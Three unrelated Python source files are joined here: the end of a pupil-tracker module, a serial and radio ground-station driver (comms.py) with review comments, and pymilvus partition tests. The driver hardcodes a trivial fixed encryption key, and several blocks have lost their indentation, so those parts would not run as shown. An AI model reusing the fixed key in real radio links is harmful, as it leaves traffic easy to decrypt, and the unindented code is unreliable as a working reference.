                signal_type, timestamp, datas = sample
                out = (signal_type, 'msg', timestamp)
                # Flatten the per-sample payload into trailing channel columns.
                for data in datas:
                    out = out + (data,)
                writer.writerow(out)
    def __str__(self):
        return 'Pupil tracker listening to %s' % self.ipc_sub_url
    def __del__(self):
        # NOTE(review): raising from __del__ is discouraged -- exceptions here
        # are swallowed by the interpreter and only print a warning. Consider
        # logging instead of re-raising AttributeError.
        try:
            self.inlet.close_stream()
        except AttributeError:
            raise AttributeError('self.inlet does not exist. Most likely the LSL stimuli stream was not opened yet.')
        self.pupil_proc.terminate()
def load(queue):
    """Create the module-level PupilTracker singleton.

    On failure, puts 'FAIL' on *queue* (when one is given) and reports the
    error instead of swallowing it with a bare except as before.
    """
    global pupil_tracker
    try:
        pupil_tracker = PupilTracker()
    except Exception as err:
        if queue is not None:
            queue.put('FAIL')
        print('failed to initialize pupil process: %r' % (err,))
def start():
    """Begin capturing on the global tracker (load() must have succeeded first)."""
    pupil_tracker.capture()
def stop():
    """Flush recorded samples to CSV, then hard-exit the process."""
    pupil_tracker.export_data()
    os._exit(0) # dirty, but it's ok because everything is already cleaned up
def sigint_handler(signal, frame):
    """SIGINT: export data and exit (see stop())."""
    stop()
def sigterm_handler(signal, frame):
    """SIGTERM: log, export data and exit (see stop())."""
    print('Pupil got terminate signal, now terminating threads.')
    stop()
def main():
    """Standalone entry point: install signal handlers, start capture, then wait."""
    signal.signal(signal.SIGINT, sigint_handler)
    signal.signal(signal.SIGTERM, sigterm_handler)
    load(queue=None)
    # Required message for subprocess comms
    print('CONNECTED')
    start()
    # Sleep until a signal arrives; the handlers above perform shutdown.
    signal.pause()
def begin(queue):
    """Subprocess entry point: like main(), but reports status over *queue*."""
    signal.signal(signal.SIGTERM, sigterm_handler)
    load(queue)
    queue.put('CONNECTED')
    start()
    # Sleep until a signal arrives; the handlers perform shutdown.
    signal.pause()
# Script entry point: run standalone (begin() is used when launched as a subprocess).
if __name__ == '__main__':
    main()
|
comms.py | ###################################################################################
# @file comms.py
###################################################################################
# _ _____ ____ ____ _____
# | |/ /_ _/ ___|| _ \| ____|
# | ' / | |\___ \| |_) | _|
# | . \ | |___ ) | __/| |___
# |_|\_\___|____/|_| |_____|
###################################################################################
# Copyright (c) 2020 KISPE Space Systems Ltd.
#
# Please follow the following link for the license agreement for this code:
# www.kispe.co.uk/projectlicenses/RA2001001003
###################################################################################
# Created on: 06-May-2021
# Mercury GS Serial Driver
# @author: Jamie Bayley (jbayley@kispe.co.uk)
###################################################################################
import queue
import struct
import threading
from enum import Enum
import serial
import config
from low_level.frameformat import PROTOCOL_DELIMITER, MAX_DATA_TYPES, DataType, DataTypeSize
from config import RaspberryPi
try:
# If this succeeds then we are using a Raspberry Pi
from config import GPIO
except ImportError:
pass
# If this succeeds then we are using a RFM69
try:
import adafruit_rfm69
except ImportError:
pass
import sys
import signal
# Raspberry Pi only: wire up the SPI bus and control pins for the RFM69 bonnet.
if RaspberryPi is True:
    try:
        import board as bonnet
        import busio
        from digitalio import DigitalInOut, Direction, Pull
        # Configure Packet Radio
        CS = DigitalInOut(bonnet.CE1)
        RESET = DigitalInOut(bonnet.D25)
        spi = busio.SPI(bonnet.SCK, MOSI=bonnet.MOSI, MISO=bonnet.MISO)
    except (NotImplementedError, NameError) as err:
        # Hardware absent or CircuitPython libs missing: report and continue
        # without radio support.
        print(repr(err))
        #spi = None
        #CS = None
        #RESET = None
# Queues decoupling the RX thread, the frame state machine and the packet handler.
frame_queue = queue.Queue()          # completed, validated frames
direct_read_queue = queue.Queue()    # raw bytes when the test interface bypasses the state machine
incoming_byte_queue = queue.Queue()  # raw bytes received from serial/radio
comms_handler = None                 # CommsHandler singleton created by comms_init()
# Legacy numeric state constants (the state machine itself uses StateMachineState).
PENDING_FRAME = 0
GATHERING_DATA = 1
READING_DATA = 2
DIRECT_READ = 3
# BCM pin wired to the RFM69 DIO0 (payload-ready) interrupt line.
DIO0_GPIO = 22
def signal_handler(sig, frame):
    """SIGINT handler: release GPIO resources (Raspberry Pi only) and exit."""
    if RaspberryPi is True:
        GPIO.cleanup()
    sys.exit(0)
def comms_register_callback(exception_handler_function_ptr):
    """ Registers the callbacks for this module to pass data back to previous modules.

    Must be called before any send/receive: the module-level
    callback_exception_handler is created here and is used throughout.
    """
    global callback_exception_handler
    # Set exception handler callback
    callback_exception_handler = exception_handler_function_ptr
class CommsHandler:
    """ A Class to handle the comms and rx_state_machine. """
    def __init__(self, port, baud_rate):
        """ Initialise the rx_listener and serial.

        NOTE(review): the `port` and `baud_rate` parameters are ignored --
        the serial link is opened with config.COM_PORT/config.BAUD_RATE
        instead. Confirm whether the parameters should be honoured.
        """
        self.rx_state_machine = StateMachine()
        if RaspberryPi is True:
            # 434 MHz RFM69 radio using the SPI bus configured at module import.
            self.radio = RadioComms(spi, CS, RESET, 434.0)
        self.serial = SerialComms(config.COM_PORT, config.BAUD_RATE)
# RadioComms subclasses adafruit_rfm69.RFM69, which only imports on a
# radio-equipped setup; defining the class raises NameError otherwise,
# hence the try/except guard around the whole definition.
try:
    class RadioComms(adafruit_rfm69.RFM69):
        """ A Class to handle the radio comms. """
        def __init__(self, spi, chip_select, reset, frequency):
            super().__init__(spi, chip_select, reset, frequency)
            # Fixed symmetric key -- both ends of the link must use the same value.
            self.encryption_key = b'\x01\x02\x03\x04\x05\x06\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08'
            self.is_open = True # Hack JPB
            self.in_waiting = 0 # Hack JPB
            self.listen()
        def rx_interrupt(self, channel):
            """GPIO rising-edge callback: drain a received packet into the byte queue."""
            if (self.payload_ready() == True):
                received_packet = self.receive(timeout=10)
                if received_packet is not None:
                    print("RECEIVED: " + str(received_packet))
                    # Split the packet into single bytes for the state machine.
                    packet_split = struct.unpack(str(len(received_packet)) + "c", received_packet)
                    for byte in packet_split:
                        incoming_byte_queue.put(byte)
except NameError:
    pass
class SerialComms(serial.Serial):
    """ A Class to handle the serial comms through a UART.

    Opens the port and runs a background RX thread that feeds
    incoming_byte_queue for the frame state machine.
    """
    def __init__(self, port, baud_rate):
        """ Initialise serial interface, set bytesize and write_timeout values. """
        try:
            super().__init__(port, baud_rate)
        except serial.serialutil.SerialException as err:
            # Port could not be configured; report and carry on so the app stays up.
            print(repr(err))
        self.bytesize = 8
        self.write_timeout = 5
        self.rx_thread = threading.Thread(target=self.rx_loop)
        # The RX thread must not keep the interpreter alive at shutdown.
        self.rx_thread.daemon = True
        # Close COM Port if open
        if self.is_open:
            self.close()
        # Open COM Port
        try:
            self.open()
            self.rx_thread.start()
        except serial.serialutil.SerialException as err:
            print(repr(err))
    def rx_loop(self):
        """RX thread body: keep reading bytes and queueing them.

        Fixes a bug where a single byte was read and the thread then
        returned immediately -- the function had no loop despite its name,
        so only the first received byte ever reached the state machine.
        """
        while self.is_open:
            try:
                rx_byte = self.read(1)
            except serial.serialutil.SerialException:
                # Port closed/unplugged underneath us: stop the thread.
                break
            if rx_byte:
                incoming_byte_queue.put(rx_byte)
    def check_baud_rate(self, requested_baud_rate):
        """ Check that the baud rate requested is not already set.

        Returns the requested rate when it differs from the current one,
        otherwise None (callers must handle the None case). The original
        compared integers with `is not`, which is identity -- not equality
        -- and is unreliable for values outside CPython's small-int cache.
        """
        if self.baudrate != requested_baud_rate:
            return requested_baud_rate
    def send(self, data_to_send):
        """ Send data over the COM Port. """
        try:
            self.write(data_to_send)
        except serial.serialutil.SerialTimeoutException as err:
            print(repr(err))
            print("ERROR: Write Has Timed Out")
            callback_exception_handler("ERROR: Write Has Timed Out")
        except serial.serialutil.PortNotOpenError as err:
            print(repr(err))
            print("ERROR: Port " + config.COM_PORT + " Not Open")
            callback_exception_handler("ERROR: Port" + config.COM_PORT + " Not Open")
        except serial.serialutil.SerialException as err:
            print(repr(err))
            print("ERROR: The handle is invalid")
            callback_exception_handler("ERROR: The handle is invalid")
class StateMachineState(Enum):
    """States of the RX frame-parsing state machine (see StateMachine).

    (Docstring corrected: the previous text, "DataType class for each
    possible data type", was copy-pasted from another enum.)
    """
    PENDING_FRAME = 1
    GATHERING_HEADER = 2
    READING_DATA = 3
class StateMachine(threading.Thread):
    """ StateMachine Class for the RX_Listener running on a separate Thread.

    Consumes raw bytes from incoming_byte_queue, unescapes doubled
    PROTOCOL_DELIMITER bytes, assembles and validates frames, and places
    completed frames on frame_queue for the packet-handler thread.
    """
    def __init__(self):
        """ Initialise Thread, buffer and checking variables. """
        super().__init__()
        self.frame_buffer = bytearray()        # bytes of the frame being assembled
        self.delimiter_received = False        # last byte seen was a delimiter
        self.test_listen = False               # True -> bypass state machine (test interface)
        self.daemon = True
        self.state = StateMachineState.PENDING_FRAME.value
        self.gathered_header = bytearray()     # header bytes collected so far
        self.header_count = 0
        self.data_length_count = 0
        self.data_length_bytes = bytearray()   # raw 4-byte big-endian length field
        self.data_length = 0
        self.got_data_length = False
        self.data_count = 0
        self.data_bytes = bytearray()          # payload bytes collected so far
    def run(self):
        """ Overloads the Thread's "run" function,
        reads directly if Test Interface is used,
        otherwise engages StateMachine.

        NOTE(review): self.direct_read() is called without the `com`
        argument that direct_read(self, com) requires -- if test_listen is
        ever set True this raises TypeError. Confirm the intended call.
        """
        while True:
            if self.test_listen is True:
                self.direct_read()
            else:
                self.run_state_machine()
    def run_state_machine(self):
        """Dispatch one received byte to the handler for the current state."""
        rx_byte = incoming_byte_queue.get()
        if self.state == StateMachineState.PENDING_FRAME.value:
            self.pending_frame(rx_byte)
        elif self.state == StateMachineState.GATHERING_HEADER.value:
            self.gathering_header(rx_byte)
        elif self.state == StateMachineState.READING_DATA.value:
            self.reading_data(rx_byte)
        else:
            # Unknown state: fail safe back to waiting for a frame start.
            self.state = StateMachineState.PENDING_FRAME.value
    def pending_frame(self, rx_byte):
        """ PENDING_FRAME State, checks for start of frame...
        (delimiter character followed by non delimiter character).
        """
        try:
            # Clear the received data buffer if it's 2 bytes
            if len(self.frame_buffer) == 2:
                self.frame_buffer.clear()
        except TypeError as err:
            print("ERROR: ", err)
            print("FIRST PASS")
        # Add byte to the frame buffer
        self.frame_buffer += rx_byte
        # Check if we have received a 0x55 followed by a non-0x55
        if (PROTOCOL_DELIMITER == self.frame_buffer[0]) and (rx_byte[0] != PROTOCOL_DELIMITER):
            # This is the start of a new frame!
            # Switch state to GATHERING_DATA
            self.state = StateMachineState.GATHERING_HEADER.value
            self.header_count = 0
        else:
            # Reenter PENDING_FRAME if start of frame not detected
            pass
    def gathering_header(self, rx_byte):
        """ GATHERING_HEADER State, reads the rest of the header. """
        # Create header bitfield buffer
        header_size = 3
        # Read a byte into Header Buffer
        self.gathered_header += rx_byte
        # Scan byte and previous byte for start of frame, pop off any double delimiter values
        self.gathered_header, self.header_count = self.delimiter_scan_and_remove(self.gathered_header,
                                                                                 self.header_count)
        # If we've read out enough bytes of the header
        if self.header_count == header_size:
            # Append gathered header onto buffer
            self.frame_buffer.extend(self.gathered_header)
            self.gathered_header.clear()
            # Check if Data Type is within range
            if int(self.frame_buffer[4]) in range(MAX_DATA_TYPES):
                # Data Type within range, switch to READING_DATA state
                self.state = StateMachineState.READING_DATA.value
            else:
                # Data Type out of range, discard message and return to PENDING_FRAME
                self.state = StateMachineState.PENDING_FRAME.value
                self.frame_buffer.clear()
    def reading_data(self, rx_byte):
        """ READING_DATA State, gathers the data length field and reads the rest of the frame,
        then if frame is valid place onto queue to be processed by the packet handler Thread.
        """
        # Create data length bitfield buffer
        data_length_size = 4
        # Iterate over Data Length bytes
        if self.data_length_count < data_length_size:
            # Read a byte into Data Length Buffer
            self.data_length_bytes += rx_byte
            # Scan byte and previous byte for start of frame, pop off any double delimiter values
            self.data_length_bytes, self.data_length_count = self.delimiter_scan_and_remove(self.data_length_bytes,
                                                                                            self.data_length_count)
        else:
            if self.got_data_length is False:
                # unpacks data_length_bytes into 32 bit unsigned integer
                try:
                    self.data_length = struct.unpack("!L", self.data_length_bytes)[0]
                except struct.error as err:
                    print(repr(err))
                    print("ERROR: Data Length is not 4 bytes")
                    callback_exception_handler("ERROR: Data Length is not 4 bytes")
                self.got_data_length = True
            # Read a byte into Data Buffer
            self.data_bytes += rx_byte
            # Scan byte and previous byte for start of frame, pop off any double delimiter values
            # NOTE(review): on the new-frame-detected path
            # delimiter_scan_and_remove returns a 2-tuple, which would make
            # this 3-value unpack raise ValueError -- confirm intended flow.
            self.data_bytes, self.data_count, self.data_length = self.delimiter_scan_and_remove(self.data_bytes,
                                                                                                self.data_count,
                                                                                                True,
                                                                                                self.data_length)
            # If we have read out enough data bytes
            if self.data_count == self.data_length:
                invalid_frame = False
                data_type = self.frame_buffer[4]
                # Check the data type against all known data types
                if not any(x.value == data_type for x in DataType):
                    invalid_frame = True
                    callback_exception_handler("ERROR: Frame Data Type Field does not match actual type.")
                # Get the data type name to use with comparing against the right data length
                data_type_key = DataType(data_type).name
                # Check the actual data length against the expected length for the data type
                if self.data_length != DataTypeSize[data_type_key].value:
                    invalid_frame = True
                    callback_exception_handler("ERROR: Frame Data Length Field does not match actual length.")
                if invalid_frame is False:
                    # Append data length and data fields onto frame buffer
                    self.frame_buffer.extend(self.data_length_bytes + self.data_bytes)
                    # Add Frame onto queue to be processed by packet handler Thread
                    frame_queue.put(self.frame_buffer)
                    # Block until packet is processed in handler Thread
                    frame_queue.join()
                # Frame has been fully processed,
                # Reset all member variables so that the state machine can process the next frame
                self.header_count = 0
                self.gathered_header.clear()
                self.data_length = 0
                self.data_length_bytes.clear()
                self.data_length_count = 0
                self.data_length = 0  # (duplicate reset of data_length above; harmless)
                self.data_bytes.clear()
                self.data_count = 0
                self.got_data_length = False
                self.delimiter_received = False
                # Set state to PENDING_FRAME
                self.state = StateMachineState.PENDING_FRAME.value
                # Clear the frame buffer
                self.frame_buffer.clear()
    def direct_read(self, com):
        """ DIRECT_READ State, entered if Test Interface is used to bypass State Machine """
        # Block until there is a byte to read
        rx_byte = self.read_byte(com)
        # Put byte onto queue
        direct_read_queue.put(rx_byte)
    @staticmethod
    def read_byte(com):
        """ Read and return a byte from the COM Port """
        rx_byte = com.read(1)
        return rx_byte
    def delimiter_scan_and_remove(self, buffer, index, data_field=False, data_length_decrement=0):
        """ Iterate through buffer, pop off a delimiter where there are 2 consecutive delimiter values,
        enter GATHERING_HEADER State if start of frame detected.

        Returns (buffer, index) normally, or
        (buffer, index, data_length_decrement) when data_field is True and
        the decrement is non-zero. NOTE(review): the new-frame path always
        returns a 2-tuple regardless of data_field -- see reading_data().
        """
        # If this byte is a delimiter
        if PROTOCOL_DELIMITER is buffer[index]:
            # and we haven't received a prior delimiter
            if self.delimiter_received is False:
                # Record that this byte is a delimiter
                self.delimiter_received = True
            # and we've received a prior valid delimiter
            else:
                # Discard the byte
                buffer.pop(index)
                # Rewind indexer to maintain stepping
                index -= 1
                if data_field is True:
                    # Add to data_length decrementer HERE to then take off data_length after entire read
                    data_length_decrement -= 1
                # Set state to wait for next delimiter
                self.delimiter_received = False
        # If this byte is not a delimiter
        else:
            # and we have received a prior delimiter that makes this an invalid sequence
            if self.delimiter_received is True:
                # This is the start of a new frame!
                # Set the frame buffer to this new frame
                self.frame_buffer = buffer
                # Reset received delimiter variable
                self.delimiter_received = False
                # Enter GATHERING_HEADER state
                self.state = StateMachineState.GATHERING_HEADER.value
                self.header_count = 0
                return buffer, 0
        # Increment the index
        index += 1
        if data_length_decrement == 0:
            return buffer, index
        else:
            return buffer, index, data_length_decrement
def comms_init(port, baud_rate):
    """ Initialise CommsHandler class instance, set COM Port and baud rate, start rx_listener Thread.

    Fixes a guard bug: the original tested `comms_handler is not CommsHandler`,
    which compares the instance against the class object and is therefore
    always true, re-creating the handler (and re-starting its RX thread)
    on every call.
    """
    global comms_handler
    if not isinstance(comms_handler, CommsHandler):
        comms_handler = CommsHandler(port, baud_rate)
        comms_handler.rx_state_machine.start()
        if RaspberryPi is True:
            # Route the radio's DIO0 payload-ready interrupt to rx_interrupt().
            GPIO.setmode(GPIO.BCM)
            GPIO.setup(DIO0_GPIO, GPIO.IN, pull_up_down=GPIO.PUD_OFF)
            GPIO.add_event_detect(DIO0_GPIO, GPIO.RISING,
                                  callback=comms_handler.radio.rx_interrupt, bouncetime=100)
    signal.signal(signal.SIGINT, signal_handler)
def comms_send(data):
    """Transmit *data* over whichever link config selects (RF69 radio or serial)."""
    global comms_handler
    use_radio = config.COMMS == "RF69" and RaspberryPi is True
    if use_radio:
        comms_handler.radio.send(data)
    elif config.COMMS == "SERIAL":
        comms_handler.serial.send(data)
def change_baud_rate(requested_baud_rate):
    """ Change baud rate to requested rate.

    Fixes two bugs: the original dereferenced `comms_handler.comms`, an
    attribute that CommsHandler never defines (the serial object lives at
    `comms_handler.serial`), and it assigned check_baud_rate()'s return
    value unconditionally -- which is None when the rate is already set,
    clobbering the valid baudrate.
    """
    global comms_handler
    new_rate = comms_handler.serial.check_baud_rate(requested_baud_rate)
    if new_rate is not None:
        comms_handler.serial.baudrate = new_rate
def flush_com_port():
    """Discard any bytes still waiting in the serial output buffer."""
    global comms_handler
    comms_handler.serial.reset_output_buffer()
def change_com_port(port):
    """Close the serial link, switch it to *port*, record it in config, and reopen."""
    global comms_handler
    link = comms_handler.serial
    link.close()
    link.port = port
    config.COM_PORT = port
    try:
        link.open()
    except serial.serialutil.SerialException as err:
        print(repr(err))
|
test_partition_20.py | import threading
import pytest
from base.partition_wrapper import ApiPartitionWrapper
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.code_mapping import PartitionErrorMessage
prefix = "partition_"
class TestPartitionParams(TestcaseBase):
""" Test case of partition interface in parameters"""
    @pytest.mark.tags(CaseLabel.L0)
    def test_partition_default(self):
        """
        target: verify create a partition
        method: create a partition
        expected: create successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition with a unique name and non-empty description,
        # asserting the reported properties via the check-task framework
        partition_name = cf.gen_unique_str(prefix)
        description = cf.gen_unique_str("desc_")
        self.init_partition_wrap(collection_w, partition_name,
                                 description=description,
                                 check_task=CheckTasks.check_partition_property,
                                 check_items={"name": partition_name, "description": description,
                                              "is_empty": True, "num_entities": 0}
                                 )
        # check that the partition has been created
        assert collection_w.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L1)
    @pytest.mark.parametrize("partition_name", [""])
    def test_partition_empty_name(self, partition_name):
        """
        target: verify create a partition with empty name
        method: create a partition with empty name
        expected: raise exception
        """
        # create a collection
        collection_w = self.init_collection_wrap()
        # creating a partition with an empty name must be rejected server-side
        self.partition_wrap.init_partition(collection_w.collection, partition_name,
                                           check_task=CheckTasks.err_res,
                                           check_items={ct.err_code: 1,
                                                        ct.err_msg: "Partition name should not be empty"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_empty_description(self):
"""
target: verify create a partition with empty description
method: create a partition with empty description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_unique_str(prefix)
description = ""
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
# check that the partition has been created
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_max_description_length(self):
"""
target: verify create a partition with 255 length name and 1024 length description
method: create a partition with 255 length name and 1024 length description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# init partition
partition_name = cf.gen_str_by_length(255)
description = cf.gen_str_by_length(2048)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True}
)
@pytest.mark.tags(CaseLabel.L1)
def test_partition_dup_name(self):
"""
target: verify create partitions with duplicate names
method: create partitions with duplicate names
expected: 1. create successfully
2. the same partition returned with diff object ids
"""
# create a collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_name = cf.gen_unique_str(prefix)
description = cf.gen_unique_str()
partition_w1 = self.init_partition_wrap(collection_w, partition_name, description)
partition_w2 = self.init_partition_wrap(collection_w, partition_name, description)
# public check func to be extracted
assert id(partition_w1.partition) != id(partition_w2.partition)
assert partition_w1.name == partition_w2.name
assert partition_w1.description == partition_w2.description
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("description", ct.get_invalid_strs)
def test_partition_special_chars_description(self, description):
"""
target: verify create a partition with special characters in description
method: create a partition with special characters in description
expected: create successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
self.init_partition_wrap(collection_w, partition_name,
description=description,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name, "description": description,
"is_empty": True, "num_entities": 0}
)
assert collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L0)
def test_partition_default_name(self):
"""
target: verify create a partition with default name
method: 1. get the _default partition
2. create a partition with _default name
expected: the same partition returned
"""
# create collection
collection_w = self.init_collection_wrap()
# check that the default partition exists
assert collection_w.has_partition(ct.default_partition_name)[0]
# check that can get the _default partition
collection, _ = collection_w.partition(ct.default_partition_name)
# check that init the _default partition object
partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
assert collection.name == partition_w.name
@pytest.mark.tags(CaseLabel.L1)
def test_partition_max_length_name(self):
"""
target: verify create a partition with max length(256) name
method: create a partition with max length name
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_str_by_length(256)
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("partition_name", ct.get_invalid_strs)
def test_partition_invalid_name(self, partition_name):
"""
target: verify create a partition with invalid name
method: create a partition with invalid names
expected: raise exception
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
self.partition_wrap.init_partition(collection_w.collection, partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, 'err_msg': "is illegal"}
)
# TODO: need an error code issue #5144 and assert independently
@pytest.mark.tags(CaseLabel.L1)
def test_partition_none_collection(self):
"""
target: verify create a partition with none collection
method: create a partition with none collection
expected: raise exception
"""
# create partition with collection is None
partition_name = cf.gen_unique_str(prefix)
self.partition_wrap.init_partition(collection=None, name=partition_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "must be pymilvus.Collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_partition_drop(self):
"""
target: verify drop a partition in one collection
method: 1. create a partition in one collection
2. drop the partition
expected: drop successfully
"""
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name)
# check that the partition exists
assert collection_w.has_partition(partition_name)[0]
# drop partition
partition_w.drop()
# check that the partition not exists
assert not collection_w.has_partition(partition_name)[0]
@pytest.mark.tags(CaseLabel.L1)
def test_partition_release(self):
"""
target: verify release partition
method: 1. create a collection and two partitions
2. insert data into each partition
3. flush and load the both partitions
4. release partition1
5. release partition1 twice
expected: 1. the 1st partition is released
2. the 2nd partition is not released
"""
# create collection
collection_w = self.init_collection_wrap()
# create two partitions
partition_w1 = self.init_partition_wrap(collection_w)
partition_w2 = self.init_partition_wrap(collection_w)
# insert data to two partition
partition_w1.insert(cf.gen_default_list_data())
partition_w2.insert(cf.gen_default_list_data())
# load two partitions
partition_w1.load()
partition_w2.load()
# search two partitions
search_vectors = cf.gen_vectors(1, ct.default_dim)
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res1) == 1 and len(res2) == 1
# release the first partition
partition_w1.release()
# check result
res1, _ = partition_w1.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1,
check_task=ct.CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "partitions have been released"})
res2, _ = partition_w2.search(data=search_vectors,
anns_field=ct.default_float_vec_field_name,
params={"nprobe": 32}, limit=1)
assert len(res2) == 1
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("data", [cf.gen_default_dataframe_data(10),
cf.gen_default_list_data(10),
cf.gen_default_tuple_data(10)])
def test_partition_insert(self, data):
"""
target: verify insert entities multiple times
method: 1. create a collection and a partition
2. partition.insert(data)
3. insert data again
expected: insert data successfully
"""
nums = 10
# create collection
collection_w = self.init_collection_wrap()
# create partition
partition_name = cf.gen_unique_str(prefix)
partition_w = self.init_partition_wrap(collection_w, partition_name,
check_task=CheckTasks.check_partition_property,
check_items={"name": partition_name,
"is_empty": True, "num_entities": 0}
)
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name]) # don't need flush for issue #5737
assert not partition_w.is_empty
assert partition_w.num_entities == nums
# insert data
partition_w.insert(data)
# self._connect().flush([collection_w.name])
assert not partition_w.is_empty
assert partition_w.num_entities == (nums + nums)
class TestPartitionOperations(TestcaseBase):
    """ Test case of partition interface in operations """
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_dropped_collection(self):
        """
        target: verify create partition against a dropped collection
        method: 1. create collection1
                2. drop collection1
                3. create partition in collection1
        expected: raise exception
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # drop collection
        collection_w.drop()
        # create partition failed
        self.partition_wrap.init_partition(collection_w.collection, cf.gen_unique_str(prefix),
                                           check_task=CheckTasks.err_res,
                                           check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
    @pytest.mark.tags(CaseLabel.L2)
    def test_partition_same_name_in_diff_collections(self):
        """
        target: verify create partitions with same name in diff collections
        method: 1. create a partition in collection1
                2. create a partition in collection2
        expected: create successfully
        """
        # create two collections
        collection_w1 = self.init_collection_wrap()
        collection_w2 = self.init_collection_wrap()
        # create 2 partitions in 2 diff collections
        partition_name = cf.gen_unique_str(prefix)
        self.init_partition_wrap(collection_wrap=collection_w1, name=partition_name)
        self.init_partition_wrap(collection_wrap=collection_w2, name=partition_name)
        # check result
        assert collection_w1.has_partition(partition_name)[0]
        assert collection_w2.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L2)
    def test_partition_multi_partitions_in_collection(self):
        """
        target: verify create multiple partitions in one collection
        method: create multiple partitions in one collection
        expected: create successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        for _ in range(10):
            partition_name = cf.gen_unique_str(prefix)
            # create partition with different names and check the partition exists
            self.init_partition_wrap(collection_w, partition_name)
            assert collection_w.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.skip(reason="skip temporarily for debug")
    def test_partition_maximum_partitions(self):
        """
        target: verify create maximum partitions
        method: 1. create maximum partitions
                2. create one more partition
        expected: raise exception
        """
        # fan the creations out over several threads to reach the cap faster
        threads_num = 8
        threads = []
        def create_partition(collection, threads_n):
            # each thread creates its share of max_partition_num partitions
            for _ in range(ct.max_partition_num // threads_n):
                name = cf.gen_unique_str(prefix)
                par_wrap = ApiPartitionWrapper()
                par_wrap.init_partition(collection, name, check_task=CheckTasks.check_nothing)
        collection_w = self.init_collection_wrap()
        for _ in range(threads_num):
            t = threading.Thread(target=create_partition, args=(collection_w.collection, threads_num))
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
        # one more partition beyond the cap must be rejected
        p_name = cf.gen_unique_str()
        self.partition_wrap.init_partition(
            collection_w.collection, p_name,
            check_task=CheckTasks.err_res,
            check_items={ct.err_code: 1,
                         ct.err_msg: "maximum partition's number should be limit to 4096"})
    @pytest.mark.tags(CaseLabel.L0)
    def test_partition_drop_default_partition(self):
        """
        target: verify drop the _default partition
        method: drop the _default partition
        expected: raise exception
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # get the default partition
        default_partition, _ = collection_w.partition(ct.default_partition_name)
        partition_w = self.init_partition_wrap(collection_w, ct.default_partition_name)
        assert default_partition.name == partition_w.name
        # verify that drop partition with error
        partition_w.drop(check_task=CheckTasks.err_res,
                         check_items={ct.err_code: 1, ct.err_msg: "default partition cannot be deleted"})
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_drop_partition_twice(self):
        """
        target: verify drop the same partition twice
        method: 1.create a partition with default schema
                2. drop the partition
                3. drop the same partition again
        expected: raise exception when 2nd time
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        collection_w.has_partition(partition_name)
        # drop partition
        partition_w.drop()
        assert not collection_w.has_partition(partition_name)[0]
        # verify that drop the partition again with exception
        partition_w.drop(check_task=CheckTasks.err_res,
                         check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
    @pytest.mark.tags(CaseLabel.L2)
    def test_partition_create_and_drop_multi_times(self):
        """
        target: verify create and drop for times
        method: 1.create a partition with default schema
                2. drop the partition
                3. loop #1 and #2 for times
        expected: create and drop successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # range for 5 times
        partition_name = cf.gen_unique_str(prefix)
        for i in range(5):
            # create partition and check that the partition exists
            partition_w = self.init_partition_wrap(collection_w, partition_name)
            assert collection_w.has_partition(partition_name)[0]
            # drop partition and check that the partition not exists
            partition_w.drop()
            assert not collection_w.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L2)
    def test_partition_drop_non_empty_partition(self):
        """
        target: verify drop a partition which has data inserted
        method: 1.create a partition with default schema
                2. insert some data
                3. drop the partition
        expected: drop successfully
        """
        # create collection
